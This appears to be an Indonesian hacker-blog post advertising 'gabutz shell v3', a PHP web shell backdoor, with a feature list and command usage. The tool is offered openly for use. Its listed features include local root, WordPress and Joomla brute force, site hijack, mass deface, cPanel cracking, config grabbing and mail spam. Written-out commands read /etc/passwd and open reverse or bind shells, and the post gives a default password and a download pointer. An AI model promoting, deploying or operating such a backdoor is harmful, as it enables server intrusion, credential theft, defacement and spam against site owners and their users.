oke guys kali ini cakil akan share gabutz shell v3 untuk fiture nya bisa kalian
liat sendiri ok oc
what it's new ?
-spawn anon(anonghost shell)
-localroot (auto root with perl)
-joomla brute force
-spawn uploader with txt
-spawn noname
-lokomedia + auto login + upload shell
-balitbang 3.5.3 (beta)
-cms popoji add admin
-sql scanner vulnerability
-streaming nekopoi
-streaming brazzer
-port scanner
-wordpress brute force
-wp auto hijack
-encode/decode
-Mail Spam
-zip menu
-full bypass
-bypass vhost
-bypass disable functions
-shell finder
-auto edit title wordpress
-Injection C0de
-domain viewer
-joomla brute force 
-about me
-contact me
-music 
fiture
=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd
 - Spawn File/Tools 
 usage: spawn [name]
 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)
-webdav(webdav)
-adfin (admin finder)
- elfinder (elfinder exploiter)
-kcfinder (kcfinder exploiter)
-csrf (csrf exploiter)
-files(files.1337) buat scanner files
-scn(scanner for python)
-gabutz2 (gabutz shell v1)
-gabutz1 (mini shell from gabutz shell v1)
-galau (galau shell v2 from 99syndicate)
-uploader txt
-anon (anonGhost shell)
-lokomedia + upload shell + auto login
-balitbang
-video (streaming nekopoi.brazzer)
-noname shell 
-popoji add admin 
-sql scanner vulnerability
 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1
 spawn  webdav
 spawn adfin
 spawn elfinder
 spawn kcfinder
 spawn csrf
 spawn gabutz1
 spawn gabutz2
 spawn galau
 spawn scn
 spawn files
 spawn anon
 spawn uploader
 spawn video
 spawn balitbang
 spawn lokomedia
 spawn popoji
 spawn noname
- scanner
usage :
spawn scn
spawn files
spawn webconsole
isi
python scanner.py http://*lusuka.coli -m files (enter)
- Jumping
usage: jumping
- Config Grabber
usage: gabutsconfig
 - Symlink 
 usage: symlink
 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl
 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl
 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp
 - Logout From Shell
usage: logout
 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit
-joomla brute force
-localroot 
-port scanner
-wordpress brute force
-wp auto hijack
-encode/decode
-Mail Spam
-zip menu
-full bypass
-bypass vhost
-bypass disable functions
-shell finder
-auto edit title wordpress -Injection C0de
-domain viewer
-joomla brute force 
-about me
-contact me
-music 
link ? Disini gan
size ? 167b (0.167kb)
default pass: mrcakil1234
pass ? di atas tulisan mrcakil
gmna ? gud bukan kwkwkwkkw
oke sekian dan terima kasih
gmna ? gud bukan kwkwkwkkw
oke sekian dan terima kasih

 
 
 
2 Comments
bang cara jalanin joomscan di
ReplyDeletegithub.com/mrcakil/Mrcakil
perl joomscan.pl -u www.example.com
Delete